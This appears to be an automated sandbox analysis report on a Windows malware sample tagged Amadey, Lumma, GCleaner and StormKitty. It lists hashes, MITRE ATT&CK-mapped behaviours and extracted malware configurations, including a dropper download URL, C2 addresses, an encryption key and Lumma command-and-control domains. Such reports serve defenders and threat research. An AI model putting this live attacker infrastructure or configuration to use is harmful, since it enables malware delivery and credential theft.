amadey | 30b834e3b80569a54e07bf5ae73b012f40a1131198f40f4883fcd9619fa38422

Analysis

max time kernel
142s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

5.4MB
MD5

fdcf8d2b057f7369ecde9c9cd517a2ef
SHA1

cd56e148f69b2ecac81574e988c1ab5318f9988e
SHA256

30b834e3b80569a54e07bf5ae73b012f40a1131198f40f4883fcd9619fa38422
SHA512

bf85aca663c81f4df3e2b667df8df9fb1d1383e158b43c25850e7f88cfd7fdf10f17487f2667836b0e881dde6e2e29281ac1fe03b851b513d92827317fca17df
SSDEEP

98304:NhG3PZnJKrhhUvVLeasXyHgcviqWljvM6pbl/UqKJnSoNRzqB0ARkP9Xk:OxJKrvUvVLHsiHgcKqWRvM6VqqK7Nwu/

Score

10^/10

amadey gcleaner lumma stormkitty 092155 bootkit collection defense_evasion discovery execution loader persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://pirtyoffensiz.bet/api

https://luncertainyelemz.bet/api

https://hobbyedsmoker.live/api

https://dsfljsdfjewf.info/api

https://gdeaddereaste.today/api

https://subawhipnator.life/api

https://fprivileggoe.live/api

https://decreaserid.world/api

https://pastedeputten.life/api

https://xrfxcaseq.live/gspaz

https://jrxsafer.top/shpaoz

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://ywmedici.top/noagis

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a00000002427b-601.dat	family_stormkitty
behavioral1/memory/2984-614-0x0000000000A60000-0x0000000000A9C000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	but2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1B04X6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ecdbcb1f1d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a8dea6421d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2g3067.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ba6103ae2a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4ceb664707.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
59	5212	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5212	powershell.exe
2180	powershell.exe

Downloads MZ/PE file 19 IoCs

flow	pid	Process
47	4912	rapes.exe
47	4912	rapes.exe
47	4912	rapes.exe
47	4912	rapes.exe
89	4912	rapes.exe
89	4912	rapes.exe
89	4912	rapes.exe
89	4912	rapes.exe
89	4912	rapes.exe
89	4912	rapes.exe
89	4912	rapes.exe
127	2484	svchost015.exe
59	5212	powershell.exe
232	4912	rapes.exe
238	4912	rapes.exe
116	5788	svchost015.exe
122	3104	svchost.exe
166	4912	rapes.exe
166	4912	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\b30be13d.sys	55a96727.exe
File created	C:\Windows\System32\Drivers\klupd_b30be13da_arkmon.sys	55a96727.exe
File created	C:\Windows\System32\Drivers\klupd_b30be13da_klbg.sys	55a96727.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b30be13d\ImagePath = "System32\\Drivers\\b30be13d.sys"	55a96727.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon\ImagePath = "System32\\Drivers\\klupd_b30be13da_arkmon.sys"	55a96727.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klbg\ImagePath = "System32\\Drivers\\klupd_b30be13da_klbg.sys"	55a96727.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klark\ImagePath = "System32\\Drivers\\klupd_b30be13da_klark.sys"	55a96727.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_mark\ImagePath = "System32\\Drivers\\klupd_b30be13da_mark.sys"	55a96727.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b30be13da_arkmon.sys"	55a96727.exe

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4ceb664707.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1B04X6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a8dea6421d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2g3067.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2g3067.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ecdbcb1f1d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a8dea6421d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1B04X6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ba6103ae2a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ba6103ae2a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ecdbcb1f1d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4ceb664707.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	1B04X6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	larBxd7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
3424	w32tm.exe

Executes dropped EXE 34 IoCs

pid	Process
5320	h5p59.exe
2932	1B04X6.exe
4912	rapes.exe
4860	2g3067.exe
4356	qhjMWht.exe
1484	177f88e45a.exe
3432	ba6103ae2a.exe
2368	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
2260	rapes.exe
5108	3368617c03.exe
5788	svchost015.exe
3624	ecdbcb1f1d.exe
2484	svchost015.exe
4440	qhjMWht.exe
5248	ICQ0sog.exe
3752	larBxd7.exe
5532	Jordan.com
2984	Yhihb8G.exe
3284	9sWdA2p.exe
1180	TbV75ZR.exe
3468	7IIl2eE.exe
5472	UZPt0hR.exe
5656	Passwords.com
4844	rapes.exe
5152	tzutil.exe
3424	w32tm.exe
13240	4ceb664707.exe
5196	a8dea6421d.exe
6460	Rm3cVPI.exe
6656	70574084.exe
7524	55a96727.exe
8568	i4cwegu.exe
11388	but2.exe
11964	pcidrv.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	1B04X6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	2g3067.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	ba6103ae2a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	4ceb664707.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	but2.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	ecdbcb1f1d.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine	a8dea6421d.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys	55a96727.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys\ = "Driver"	55a96727.exe

Loads dropped DLL 25 IoCs

pid	Process
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe
7524	55a96727.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	h5p59.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\7df93c02-4d7f-4d09-b278-83ab61b5adb2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{2db144a4-9814-4f11-b7eb-80811e5d0b86}\\7df93c02-4d7f-4d09-b278-83ab61b5adb2.cmd\""	55a96727.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	55a96727.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
102	ipinfo.io
103	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	4ceb664707.exe
File opened for modification	\??\PhysicalDrive0	55a96727.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000024246-58.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
5124	tasklist.exe
6008	tasklist.exe
6096	tasklist.exe
5112	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
2932	1B04X6.exe
4912	rapes.exe
4860	2g3067.exe
3432	ba6103ae2a.exe
2368	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
2260	rapes.exe
3624	ecdbcb1f1d.exe
4844	rapes.exe
13240	4ceb664707.exe
5196	a8dea6421d.exe
11388	but2.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 5108 set thread context of 5788	5108	3368617c03.exe	126
PID 3624 set thread context of 2484	3624	ecdbcb1f1d.exe	130
PID 5248 set thread context of 5364	5248	ICQ0sog.exe	133
PID 1180 set thread context of 408	1180	TbV75ZR.exe	163

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	55a96727.exe
File opened (read-only)	\??\VBoxMiniRdrDN	70574084.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	1B04X6.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 8 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	55a96727.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	55a96727.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4524	2984	WerFault.exe	148

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	i4cwegu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3368617c03.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	h5p59.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1B04X6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ecdbcb1f1d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	70574084.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4ceb664707.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Yhihb8G.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a8dea6421d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	55a96727.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcidrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	177f88e45a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2g3067.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	but2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba6103ae2a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2420	cmd.exe
1688	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Yhihb8G.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Yhihb8G.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
12092	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
11852	schtasks.exe
5992	schtasks.exe
11736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2932	1B04X6.exe
2932	1B04X6.exe
4912	rapes.exe
4912	rapes.exe
4860	2g3067.exe
4860	2g3067.exe
4356	qhjMWht.exe
4356	qhjMWht.exe
4356	qhjMWht.exe
4356	qhjMWht.exe
4356	qhjMWht.exe
4356	qhjMWht.exe
5212	powershell.exe
5212	powershell.exe
5212	powershell.exe
3432	ba6103ae2a.exe
3432	ba6103ae2a.exe
2368	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
2368	TempXLXOFLKVT3AMQPDDY8DLI12CIRWEFCRV.EXE
3432	ba6103ae2a.exe
3432	ba6103ae2a.exe
3432	ba6103ae2a.exe
3432	ba6103ae2a.exe
2260	rapes.exe
2260	rapes.exe
